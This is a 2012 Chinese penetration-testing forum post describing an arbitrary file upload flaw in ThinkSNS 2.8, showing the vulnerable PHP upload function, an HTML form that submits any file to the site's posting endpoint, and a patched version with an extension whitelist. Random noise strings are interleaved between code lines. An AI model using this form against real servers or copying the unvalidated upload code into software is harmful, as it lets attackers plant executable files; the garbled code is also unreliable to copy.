中国网络渗透测试联盟
标题:
ThinkSNS 2.8任意文件上传漏洞及修复
[打印本页]
作者:
admin
时间:
2012-12-4 11:12
标题:
ThinkSNS 2.8任意文件上传漏洞及修复
微博上传图片时只在前端进行验证, 服务器端没有进行安全过滤。
) L* m4 u' D% Q/ u
% f) }& d: L3 Z5 b4 s! y# m+ P
& N3 U, x8 V9 g3 `2 p0 {
\api\StatusesApi.class.php
2 f) J4 C+ D5 }
) t4 W# g( ^5 Y) r. p# @
function uploadpic(){
; T- ^# m" L: F. f/ w* t/ @
if( $_FILES['pic'] ){
/ M3 `0 P' b- A( r& d4 l3 y a- J
//执行上传操作
$ Q" [9 a! a5 z
$savePath = $this->_getSaveTempPath();
; t5 }! [9 m- f( o6 f" l: P
$filename = md5( time().'teste' ).'.'.substr($_FILES['pic']['name'],strpos($_FILES['pic']['name'],'.')+1);
) M% `7 p* `' C# {( \, m( m
if(@copy($_FILES['pic']['tmp_name'], $savePath.'/'.$filename) || @move_uploaded_file($_FILES['pic']['tmp_name'], $savePath.'/'.$filename))
( Y" O7 k6 z. k/ R" k$ M- y
{
1 D0 _1 o7 w- H; l5 e
$result['boolen'] = 1;
, l* l9 R& [0 F- }# E) ?- a/ k
$result['type_data'] = 'temp/'.$filename;
5 G. H5 R3 f$ a( k( T3 C, d
$result['picurl'] = SITE_PATH.'/uploads/temp/'.$filename;
' l5 \5 W) X8 R! C6 B O8 ^
} else {
' \( `% [8 w( d- T
$result['boolen'] = 0;
$ [$ R& t/ r* i8 x9 v
$result['message'] = '上传失败';
9 T8 c- O2 q | n; r$ L* J6 r5 B A
}
/ ?) J0 a, g6 j: S* @
}else{
# Y1 [7 a1 ? @2 J& v+ y
$result['boolen'] = 0;
+ [9 y* y8 G) W+ P6 J- b6 {5 f5 t
$result['message'] = '上传失败';
$ q8 J/ S! e& T$ ^
}
4 Y; D& {; C# x7 f5 b8 P' |, [! V) e9 T
return $result;
( M1 V6 P' P! k) }; s
}
/ F9 W) F9 L& b, J+ y' R, c+ s4 ]
unloadpic()方法没有对文件类型进行验证
3 V C" m4 e2 H$ _& P5 ~% G
" |5 ?4 ^: i7 s" a& x+ o
可以构建表单, 选择任意文件, 提交到
* p5 k1 k% F2 g4 p7 t
/index.php?app=w3g&mod=Index&act=doPost
" [6 Q& Z6 O% c1 ~
% A9 a$ R, i' K/ L8 t& X( y* X5 Q( U
在新提交的微博上可以找到上传的文件地址(去掉small_、middle_ 前缀)
$ z! B" I m3 s# v( i8 n3 A2 B
- w) d- C& B0 W/ m6 @, j/ i) E
+ B" i. b" S) |+ {3 R: P4 M. M0 o' j
在登录thinksns官方微博后,
0 ]+ L; K* y& ` A8 s* _ Z
构建以下表单:
a1 P8 e5 i2 X" e- c
+ t T, j5 R& u3 a3 o9 ?
<form action="http://t.thinksns.com/index.php?app=w3g&mod=Index&act=doPost" method="post" enctype="multipart/form-data" />
4 M( i) s8 i& ]
<textarea name="content">test</textarea>
, p. [; n" l# v" S# }( E
file: <input id="file" type="file" name="pic" />
, o# p; p! u- B9 u/ Y
<input type="submit" value="Post" />
5 U" ?. Y$ ?& u+ H- C
</form>
* y, r' P, w X$ S
去掉缩略图的前缀(small_ )
1 K. t: \ ]4 i' ]
修复方案:
q5 E2 c' j l
+ L. _6 N$ E8 `# {& b6 a* {1 G+ Z# B' M
, }& ? N- y' d( [
\api\StatusesApi.class.php
% O0 c$ ?+ _& m7 {1 {4 g
. ^/ E2 x4 K2 q+ I
function uploadpic(){
3 C) z) k9 ^. n9 {( q( a
/**
7 E9 A7 z8 ^+ \+ _. P. O& T/ j
* 20121018 @yelo
- r) S7 \) u) E3 D2 [: N7 A. `
* 增加上传类型验证
- l8 m. \8 P8 C5 K8 w- C
*/
: ^. ~& N3 o% u D
$pathinfo = pathinfo($_FILES['pic']['name']);
* F, f4 _' p( ~% `
$ext = $pathinfo['extension'];
0 Z- z! v6 t6 V" R" s9 B
$allowExts = array('jpg', 'png', 'gif', 'jpeg');
1 U6 ~& T' F6 {. z
9 b1 U* a$ x: i% p) @
$uploadCondition = $_FILES['pic'] && in_array(strtolower($ext),$allowExts,true);
8 u: [! ~& w% Y3 Z
$ m0 P0 N, y' F* p a
if( $uploadCondition ){
, g4 C$ k8 z3 g% |3 b* D* Y; R
//执行上传操作
4 c' j2 i# }2 \$ p6 L8 L+ \6 t( i
$savePath = $this->_getSaveTempPath();
" _, S& \9 \7 Z, h% i
$filename = md5( time().'teste' ).'.'.substr($_FILES['pic']['name'],strpos($_FILES['pic']['name'],'.')+1);
6 \7 @5 b1 A- Y( E" y% e3 d( W+ B8 ^
if(@copy($_FILES['pic']['tmp_name'], $savePath.'/'.$filename) || @move_uploaded_file($_FILES['pic']['tmp_name'], $savePath.'/'.$filename))
; I( N% E5 {% B
{
K' i% X" }* w& n4 f
$result['boolen'] = 1;
* s x4 |# b# d) q: v- y& j
$result['type_data'] = 'temp/'.$filename;
) `* j* ?* {2 Y
$result['picurl'] = SITE_PATH.'/uploads/temp/'.$filename;
4 A" S W: u7 j2 e" V
} else {
6 {3 a& W; J" S1 b
$result['boolen'] = 0;
r$ @# z& E. T; r4 i1 Y
$result['message'] = '上传失败';
v* R* H; A' T7 J7 O0 E/ U
}
/ H9 e) `& K7 f. ^# b8 r- ~
}else{
0 r6 U- V; c2 r. b) n- v5 t8 a
$result['boolen'] = 0;
3 ?# g3 I) H4 U9 P% s
$result['message'] = '上传失败';
8 s) | R: K3 e6 X9 s
}
. P/ m Q" z2 Y$ N D# _
return $result;
, E' w: p+ Q. g; I
}
6 V8 x, {5 Z9 b; a
& {, U" ]% i6 W1 T, N! d: t2 W
. Z9 N" ~# d7 M$ @! M/ a, n$ H
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2